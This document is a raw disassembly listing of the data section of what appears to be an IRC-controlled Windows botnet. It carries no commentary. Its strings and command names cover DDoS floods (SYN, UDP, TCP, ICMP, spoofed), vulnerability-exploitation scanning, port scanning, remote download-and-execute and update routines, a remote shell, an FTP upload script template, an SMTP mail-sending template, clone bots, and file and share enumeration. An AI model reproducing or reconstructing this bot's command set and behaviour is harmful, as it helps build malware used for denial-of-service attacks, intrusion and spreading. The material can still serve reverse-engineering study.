dd 2029206Ch, 2BBBB02h, 6F432020h, 6E616D6Dh, 203A7364h
dd 7325h
dword_434878 dd 28026502h, 62302E31h, 20282029h, 2E646D63h, 1F641F6Dh
; DATA XREF: sub_40CD3A+447F�o
dd 2029206Ch, 2BBBB02h
aErrorSendingTo db ' Error sending to remote shell.',0
align 4
dword_4348B8 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+4439�o
dd 2029206Ch, 2BBBB02h
aReadFileFailed db ' Read file failed: %s',0
align 4
dword_4348EC dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+4425�o
dd 2029206Ch, 2BBBB02h
aReadFileComple db ' Read file complete: %s',0
align 4
dword_434924 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+43A0�o
dd 2029206Ch, 2BBBB02h, 65472020h, 736F6874h, 25203A74h
dd 2E73h
dword_434950 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_41109F�o
dd 2029206Ch, 2BBBB02h
aUnableToExtrac db ' Unable to extract Gethost command.',0
align 4
dword_434994 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+434F�o
dd 2029206Ch, 2BBBB02h
aGethostSComman db ' Gethost: %s, Command: %s',0
align 4
dword_4349CC dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+42CD�o
dd 2029206Ch, 2BBBB02h
aAliasAddedS_ db ' Alias added: %s.',0
align 4
dword_4349FC dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+428F�o
dd 2029206Ch, 2BBBB02h
aPrivmsgSS_ db ' Privmsg: %s: %s.',0
align 4
dword_434A2C dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+4239�o
dd 2029206Ch, 2BBBB02h
aActionSS_ db ' Action: %s: %s.',0
align 4
dword_434A5C dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+41CE�o
dd 2029206Ch, 2BBBB02h, 79432020h, 2E656C63h, 0
dword_434A84 dd 54524150h, 0D732520h, 0Ah ; sub_40CD3A+4A4E�o
dword_434A90 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+416D�o
dd 2029206Ch, 2BBBB02h
aModeChangeS db ' Mode change: %s',0
align 10h
aModeS db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_40CD3A+415F�o
align 4
dword_434ACC dd 28026502h, 62302E31h, 20282029h, 6E6F6C63h, 1F6D2E65h
; DATA XREF: sub_40CD3A+4136�o
dd 206C1F64h, 0BB022029h, 202002BBh, 20776152h, 29732528h
dd 7325203Ah, 0
dword_434AFC dd 28026502h, 62302E31h, 20282029h, 6E6F6C63h, 1F6D2E65h
; DATA XREF: sub_40CD3A+40CB�o
dd 206C1F64h, 0BB022029h, 202002BBh, 65646F4Dh, 73252820h
dd 25203A29h, 73h
dword_434B2C dd 45444F4Dh, 732520hdword_434B34 dd 28026502h, 62302E31h, 20282029h, 6E6F6C63h, 1F6D2E65h
; DATA XREF: sub_40CD3A+4044�o
dd 206C1F64h, 0BB022029h, 202002BBh, 6B63694Eh, 73252820h
dd 25203A29h, 73h
dword_434B64 dd 4B43494Eh, 732520h ; sub_40CD3A+48AB�o
dword_434B6C dd 4E494F4Ah, 20732520h, 7325hdword_434B78 dd 54524150h, 732520hdword_434B80 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_410C86�o
dd 2029206Ch, 2BBBB02h
aRepeatNotAllow db ' Repeat not allowed in command line: %s',0
align 4
dword_434BC8 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+3F15�o
dd 2029206Ch, 2BBBB02h, 65522020h, 74616570h, 7325203Ah
dd 0
aRepeat db 'repeat',0 ; DATA XREF: sub_40CD3A+3EC4�o
align 4
dword_434BFC dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_410BB6�o
dd 2029206Ch, 2BBBB02h, 65442020h, 2E79616Ch, 0
dword_434C24 dd 25207325h, 73252073h, 73253A20h, 2 dup(0) ; sub_40CD3A+3EEF�o ...
unk_434C38 db 2 ; DATA XREF: sub_40CD3A:loc_410B25�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 75h ; u
db 70h, 64h, 61h
db 74h ; t
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aBotIdMustBeDif db ' Bot ID must be different than current running process.',0
unk_434C90 db 2 ; DATA XREF: sub_40CD3A+3DCC�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 75h ; u
db 70h, 64h, 61h
db 74h ; t
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToStartD db ' Failed to start download thread, error: <%d>.',0
align 10h
unk_434CE0 db 2 ; DATA XREF: sub_40CD3A+3D73�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 75h ; u
db 70h, 64h, 61h
db 74h ; t
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aDownloadingUpd db ' Downloading update from: %s.',0
align 10h
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_40CD3A+3CCD�o
align 4
dword_434D2C dd 28026502h, 62302E31h, 20282029h, 63657865h, 641F6D2Eh
; DATA XREF: sub_40CD3A+3C6E�o
dd 29206C1Fh, 0BBBB0220h, 43202002h, 616D6D6Fh, 3A73646Eh
dd 732520h
unk_434D58 db 2 ; DATA XREF: sub_40CD3A+3C63�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 65h ; e
db 78h, 65h, 63h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCouldnTExecute db ' Couldn',27h,'t execute file.',0
align 10h
unk_434D90 db 2 ; DATA XREF: sub_40CD3A+3BB1�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_14 db ' Failed to start search thread, error: <%d>.',0
align 10h
unk_434DE0 db 2 ; DATA XREF: sub_40CD3A+3B4D�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingFor_0 db ' Searching for file: %s in: %s.',0
align 4
dword_434E24 dd 28026502h, 62302E31h, 20282029h, 656C6966h, 641F6D2Eh
; DATA XREF: sub_40CD3A:loc_4107E9�o
; sub_40CD3A:loc_41143F�o
dd 29206C1Fh, 0BBBB0220h, 2002h
unk_434E44 db 2 ; DATA XREF: sub_40CD3A+3A9A�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 69h, 6Ch, 65h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aRenameSToS_ db ' Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 10h
unk_434E80 db 2 ; DATA XREF: sub_40CD3A:loc_4107B2�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 69h ; i
db 63h, 6Dh, 70h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aInvalidFloodTi db ' Invalid flood time must be greater than 0.',0
align 10h
unk_434ED0 db 2 ; DATA XREF: sub_40CD3A+3A59�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 69h ; i
db 63h, 6Dh, 70h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartF db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_434F1C db 2 ; DATA XREF: sub_40CD3A+39F5�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 69h ; i
db 63h, 6Dh, 70h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSForSS db ' Flooding: (%s) for %s seconds.',0
align 10h
unk_434F60 db 2 ; DATA XREF: sub_40CD3A+3969�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 63h ; c
db 6Ch, 6Fh, 6Eh
db 65h ; e
db 73h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToSta_15 db ' Failed to start clone thread, error: <%d>.',0
align 10h
unk_434FB0 db 2 ; DATA XREF: sub_40CD3A+3910�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 63h ; c
db 6Ch, 6Fh, 6Eh
db 65h ; e
db 73h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aCreatedOnSDInC db ' Created on %s:%d, in channel %s.',0
align 8
unk_434FF8 db 2 ; DATA XREF: sub_40CD3A+3866�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 64h, 6Fh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_16 db ' Failed to start flood thread, error: <%d>.',0
align 8
dword_435048 dd 28026502h, 62302E31h db 29h, 20h
word_435052 dw 2028h ; DATA XREF: .text:off_4333B4�o
db 64h ; d
db 64h, 6Fh, 73h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSSForS db ' Flooding: (%s:%s) for %s seconds.',0
align 10h
dword_435090 dd 28026502h, 62302E31h, 20282029h, 2E6E7973h, 1F641F6Dh
; DATA XREF: sub_40CD3A+375D�o
dd 2029206Ch, 2BBBB02h
aFailedToSta_17 db ' Failed to start flood thread, error: <%d>.',0
align 10h
dword_4350E0 dd 28026502h, 62302E31h, 20282029h, 2E6E7973h, 1F641F6Dh
; DATA XREF: sub_40CD3A+36F5�o
dd 2029206Ch, 2BBBB02h
aFloodingSSFo_0 db ' Flooding: (%s:%s) for %s seconds.',0
unk_435120 db 2 ; DATA XREF: sub_40CD3A+3670�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_18 db ' Failed to start transfer thread, error: <%d>.',0
align 4
unk_435174 db 2 ; DATA XREF: sub_40CD3A+3617�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloadingUrl db ' Downloading URL: %s to: %s.',0
align 8
unk_4351B8 db 2 ; DATA XREF: sub_40CD3A+3533�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartR db ' Failed to start redirection thread, error: <%d>.',0
align 10h
dword_435210 dd 28026502h, 62302E31h, 20282029h, 69646572h, 74636572h
; DATA XREF: sub_40CD3A+34DA�o
dd 641F6D2Eh, 29206C1Fh, 0BBBB0220h, 54202002h, 72205043h
dd 72696465h, 20746365h, 61657263h, 20646574h
db 66h
aRomSDToSD_ db 'rom: %s:%d to: %s:%d.',0 ; DATA XREF: .text:off_42450C�o
align 10h
unk_435260 db 2 ; DATA XREF: sub_40CD3A+343A�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_19 db ' Failed to start scan thread, error: <%d>.',0
align 10h
unk_4352B0 db 2 ; DATA XREF: sub_40CD3A+33E1�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aPortScanStarte db ' Port scan started: %s:%d with delay: %d(ms).',0
aSSS_0 db '[%s] <%s> %s',0 ; DATA XREF: sub_40CD3A+335D�o
align 10h
aSSS_1 db '[%s] * %s %s',0 ; DATA XREF: sub_40CD3A+3263�o
align 10h
dword_435320 dd 54434101h, 204E4F49h, 17325h, 0 ; sub_40CD3A+421A�o
dword_435330 dd 28026502h, 62302E31h, 20282029h, 6C707865h, 2E74696Fh
; DATA XREF: sub_40CD3A+3161�o
; sub_40CD3A+4D39�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aFailedToSta_20 db ' Failed to start scan thread, error: <%d>.',0
align 10h
dword_435380 dd 28026502h, 62302E31h, 20282029h, 6C707865h, 2E74696Fh
; DATA XREF: sub_40CD3A+3108�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aSExploitationS db ' %s Exploitation started on %s:%d waiting %d seconds for %d minu'
db 'tes using %d threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_40CD3A+30DD�o
; sub_40CD3A+4CAF�o
align 4
aRandom_0 db 'Random',0 ; DATA XREF: sub_40CD3A+30D6�o
; sub_40CD3A+4CA8�o
align 10h
dword_435410 dd 28026502h, 62302E31h, 20282029h, 6C707865h, 2E74696Fh
; DATA XREF: sub_40CD3A+2F98�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aFailedToSta_21 db ' Failed to start scan, no IP specified.',0
align 10h
dword_435460 dd 28026502h, 62302E31h, 20282029h, 6C707865h, 2E74696Fh
; DATA XREF: sub_40CD3A+2E52�o
; sub_40CD3A+4AF3�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aAlreadyDScanni db ' Already %d scanning threads. Too many specified.',0
align 8
dword_4354B8 dd 28026502h, 62302E31h, 20282029h, 2E706475h, 1F641F6Dh
; DATA XREF: sub_40CD3A+2E0C�o
dd 2029206Ch, 2BBBB02h
aFailedToSta_22 db ' Failed to start flood thread, error: <%d>.',0
align 8
dword_435508 dd 28026502h, 62302E31h, 20282029h, 2E706475h, 1F641F6Dh
; DATA XREF: sub_40CD3A+2DB3�o
dd 2029206Ch, 2BBBB02h
aSendingDPacket db ' Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 4
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_40CD3A+2CFC�o
align 10h
unk_435580 db 2 ; DATA XREF: sub_40CD3A+2CD2�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 69h, 6Eh, 67h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_23 db ' Failed to start flood thread, error: <%d>.',0
align 10h
unk_4355D0 db 2 ; DATA XREF: sub_40CD3A+2C79�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 69h, 6Eh, 67h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSendingDPingsT db ' Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 10h
dword_435630 dd 28026502h, 62302E31h, 20282029h, 2E706374h, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_40F8E3�o
dd 2029206Ch, 2BBBB02h
aInvalidFlood_0 db ' Invalid flood time must be greater than 0.',0
align 10h
dword_435680 dd 28026502h, 62302E31h, 20282029h, 2E706374h, 1F641F6Dh
; DATA XREF: sub_40CD3A+2B8D�o
dd 2029206Ch, 2BBBB02h
aFailedToSta_24 db ' Failed to start flood thread, error: <%d>.',0
align 10h
dword_4356D0 dd 28026502h, 62302E31h, 20282029h, 2E706374h, 1F641F6Dh
; DATA XREF: sub_40CD3A+2B29�o
dd 2029206Ch, 2BBBB02h
aSSFloodingSSFo db ' %s %s flooding: (%s:%s) for %s seconds.',0
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_40CD3A+2B19�o
align 10h
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_40CD3A+2B12�o
dword_435728 dd 28026502h, 62302E31h, 20282029h, 2E706374h, 1F641F6Dh
; DATA XREF: sub_40CD3A+2A7D�o
dd 2029206Ch, 2BBBB02h
aInvalidFloodTy db ' Invalid flood type specified.',0
align 8
dword_435768 dd 28026502h, 62302E31h, 20282029h, 2E707466h, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_40F6CE�o
dd 2029206Ch, 2BBBB02h
aUploadingFileS db ' Uploading file: %s to: %s failed.',0
dword_4357A8 dd 28026502h, 62302E31h, 20282029h, 2E707466h, 1F641F6Dh
; DATA XREF: sub_40CD3A+298D�o
dd 2029206Ch, 2BBBB02h
aUploadingFil_0 db ' Uploading file: %s to: %s',0
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_40CD3A+2976�o
aSS_4 db '-s:%s',0 ; DATA XREF: sub_40CD3A+295F�o
align 10h
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_40CD3A+293F�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_40CD3A+290A�o
align 4
dword_435824 dd 28026502h, 62302E31h, 20282029h, 2E707466h, 1F641F6Dh
; DATA XREF: sub_40CD3A+2884�o
dd 2029206Ch, 2BBBB02h
aFileNotFoundS_ db ' File not found: %s.',0
align 4
aFtp_upload db 'ftp.upload',0 ; DATA XREF: sub_40CD3A+2861�o
align 4
aUtil_hcon db 'util.hcon',0 ; DATA XREF: sub_40CD3A+283E�o
align 10h
aUtil_httpcon db 'util.httpcon',0 ; DATA XREF: sub_40CD3A+2827�o
align 10h
unk_435880 db 3 ; DATA XREF: sub_40CD3A+27D8�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 65h, 6Eh
db 7Ah ; z
db 31h, 30h, 62h
db 20h
db 3, 32h, 2Eh
db 2Eh ; .
db 20h, 3, 31h
db 35h ; 5
db 28h, 65h, 6Dh
db 61h ; a
db 69h, 6Ch, 3
db 32h ; 2
db 2Eh, 3, 31h
db 35h ; 5
db 6Dh, 6Fh, 64h
db 29h ; )
db 20h, 3, 32h
db 0BBh ; »
db 3, 31h, 35h
aMessageSentToS db ' Message sent to %s.',0
align 8
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_40CD3A+2764�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
a_: ; DATA XREF: sub_40CD3A+26C8�o
unicode 0, <_>,0
aUtil_email db 'util.email',0 ; DATA XREF: sub_40CD3A+2679�o
align 4
aUsa db 'usa',0 ; DATA XREF: sub_40CD3A+2662�o
aDdos_tcpflood db 'ddos.tcpflood',0 ; DATA XREF: sub_40CD3A+264B�o
align 4
aPg db 'pg',0 ; DATA XREF: sub_40CD3A+2634�o
align 4
aDdos_pingf db 'ddos.pingf',0 ; DATA XREF: sub_40CD3A+261D�o
align 4
aDdos_pingflood db 'ddos.pingflood',0 ; DATA XREF: sub_40CD3A+2606�o
align 4
aPu db 'pu',0 ; DATA XREF: sub_40CD3A+25EF�o
align 4
aDdos_udpf db 'ddos.udpf',0 ; DATA XREF: sub_40CD3A+25D8�o
align 4
aDdos_udpflood db 'ddos.udpflood',0 ; DATA XREF: sub_40CD3A+25C1�o
align 4
aVuln_start db 'vuln.start',0 ; DATA XREF: sub_40CD3A+2593�o
align 4
aClone_ac db 'clone.ac',0 ; DATA XREF: sub_40CD3A+256A�o
align 10h
aClone_action db 'clone.action',0 ; DATA XREF: sub_40CD3A+2553�o
align 10h
aClone_pm db 'clone.pm',0 ; DATA XREF: sub_40CD3A+253C�o
align 4
aClone_privmsg db 'clone.privmsg',0 ; DATA XREF: sub_40CD3A+2525�o
align 4
aEnz_ps db 'enz.ps',0 ; DATA XREF: sub_40CD3A+250E�o
align 4
aEnz_portscan db 'enz.portscan',0 ; DATA XREF: sub_40CD3A+24F7�o
align 4
aServer_rd_on db 'server.rd.on',0 ; DATA XREF: sub_40CD3A+24E0�o
align 4
aServer_redir_0 db 'server.redirect.on',0 ; DATA XREF: sub_40CD3A+24C9�o
align 4
aD1 db 'd1',0 ; DATA XREF: sub_40CD3A+24B2�o
align 4
aDownload_fromw db 'download.fromwww',0 ; DATA XREF: sub_40CD3A+249B�o
align 10h
aSy1 db 'sy1',0 ; DATA XREF: sub_40CD3A+2484�o
aDdos_synflood db 'ddos.synflood',0 ; DATA XREF: sub_40CD3A+246D�o
align 4
aDs_rm db 'ds.rm',0 ; DATA XREF: sub_40CD3A+2456�o
align 4
aDs_ack db 'ds.ack',0 ; DATA XREF: sub_40CD3A+243F�o
align 4
aDs_sy1 db 'ds.sy1',0 ; DATA XREF: sub_40CD3A+2428�o
align 4
aClone_start db 'clone.start',0 ; DATA XREF: sub_40CD3A+2411�o
aClone_make db 'clone.make',0 ; DATA XREF: sub_40CD3A+23FA�o
align 4
aDdos_ic db 'ddos.ic',0 ; DATA XREF: sub_40CD3A+23D1�o
aDdos_icmp db 'ddos.icmp',0 ; DATA XREF: sub_40CD3A+23BA�o
align 4
aBox_mv db 'box.mv',0 ; DATA XREF: sub_40CD3A+23A3�o
align 10h
aBox_rename db 'box.rename',0 ; DATA XREF: sub_40CD3A+238C�o
align 4
aBox_ff db 'box.ff',0 ; DATA XREF: sub_40CD3A+2375�o
align 4
aBox_findfile db 'box.findfile',0 ; DATA XREF: sub_40CD3A+235E�o
align 4
aBox_e db 'box.e',0 ; DATA XREF: sub_40CD3A+2347�o
align 4
aBox_execute db 'box.execute',0 ; DATA XREF: sub_40CD3A+2330�o
aDownload_upz db 'download.upz',0 ; DATA XREF: sub_40CD3A+2319�o
align 4
aDownload_updiz db 'download.updiz',0 ; DATA XREF: sub_40CD3A+2302�o
align 4
aEnz_de db 'enz.de',0 ; DATA XREF: sub_40CD3A+22EB�o
align 10h
aEnz_delay db 'enz.delay',0 ; DATA XREF: sub_40CD3A+22D4�o
align 4
aEnz_rp db 'enz.rp',0 ; DATA XREF: sub_40CD3A+22BD�o
align 4
aEnz_repeat db 'enz.repeat',0 ; DATA XREF: sub_40CD3A+22A6�o
align 10h
aClone_p db 'clone.p',0 ; DATA XREF: sub_40CD3A+228F�o
aClone_part db 'clone.part',0 ; DATA XREF: sub_40CD3A+2278�o
align 4
aClone_j db 'clone.j',0 ; DATA XREF: sub_40CD3A+2261�o
aClone_join db 'clone.join',0 ; DATA XREF: sub_40CD3A+224A�o
align 4
aClone_ni db 'clone.ni',0 ; DATA XREF: sub_40CD3A+2233�o
align 4
aClone_nick db 'clone.nick',0 ; DATA XREF: sub_40CD3A+221C�o
align 10h
aClone_m db 'clone.m',0 ; DATA XREF: sub_40CD3A+2205�o
aClone_mode db 'clone.mode',0 ; DATA XREF: sub_40CD3A+21EE�o
align 4
aClone_ra db 'clone.ra',0 ; DATA XREF: sub_40CD3A+21D7�o
align 10h
aClone_raw db 'clone.raw',0 ; DATA XREF: sub_40CD3A+21C0�o
align 4
aEnz_m db 'enz.m',0 ; DATA XREF: sub_40CD3A+21A9�o
align 4
aEnz_mode db 'enz.mode',0 ; DATA XREF: sub_40CD3A+2192�o
align 10h
aEnz_cy db 'enz.cy',0 ; DATA XREF: sub_40CD3A+217B�o
align 4
aEnz_cycle db 'enz.cycle',0 ; DATA XREF: sub_40CD3A+2164�o
align 4
aEnz_ac db 'enz.ac',0 ; DATA XREF: sub_40CD3A+214D�o
align 4
aEnz_action db 'enz.action',0 ; DATA XREF: sub_40CD3A+2136�o
align 4
aEnz_pm db 'enz.pm',0 ; DATA XREF: sub_40CD3A+211F�o
align 10h
aEnz_privmsg db 'enz.privmsg',0 ; DATA XREF: sub_40CD3A+2108�o
aEnz_aa db 'enz.aa',0 ; DATA XREF: sub_40CD3A+20F1�o
align 4
aEnz_addalias db 'enz.addalias',0 ; DATA XREF: sub_40CD3A+20DA�o
align 4
aEnz_gh db 'enz.gh',0 ; DATA XREF: sub_40CD3A+20B1�o
align 4
aEnz_gethost db 'enz.gethost',0 ; DATA XREF: sub_40CD3A+209A�o
dword_435BD8 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_40EDB9�o
dd 2029206Ch, 2BBBB02h
aCommandUnknown db ' Command unknown.',0
align 4
dword_435C08 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_40EDB2�o
dd 2029206Ch, 2BBBB02h
aNoMessageSpeci db ' No message specified.',0
dword_435C3C dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_40ED67�o
dd 2029206Ch, 2BBBB02h
aUserListFailed db ' User list failed.',0
dword_435C6C dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_40CD3A+2026�o
dd 2029206Ch, 2BBBB02h
aUserListComple db ' User list completed.',0
align 10h
aUser db 'user',0 ; DATA XREF: sub_40CD3A+1F9F�o
align 4
dword_435CA8 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_40ECCE�o
dd 2029206Ch, 2BBBB02h
aShareListFaile db ' Share list failed.',0
align 4
dword_435CDC dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_40CD3A+1F8A�o
dd 2029206Ch, 2BBBB02h
aShareListCompl db ' Share list completed.',0
aShare db 'share',0 ; DATA XREF: sub_40CD3A+1F1C�o
align 4
aDelete db 'delete',0 ; DATA XREF: sub_40CD3A+1F01�o
align 10h
aPause db 'pause',0 ; DATA XREF: sub_40CD3A+1ECB�o
align 4
aStop db 'stop',0 ; DATA XREF: sub_40CD3A+1EB3�o
align 10h
dword_435D30 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_40CD3A:loc_40EBE2�o
dd 2029206Ch, 2BBBB02h
aServiceListFai db ' Service list failed.',0
align 4
dword_435D64 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_40CD3A+1E9E�o
dd 2029206Ch, 2BBBB02h
aServiceListCom db ' Service list completed.',0
align 10h
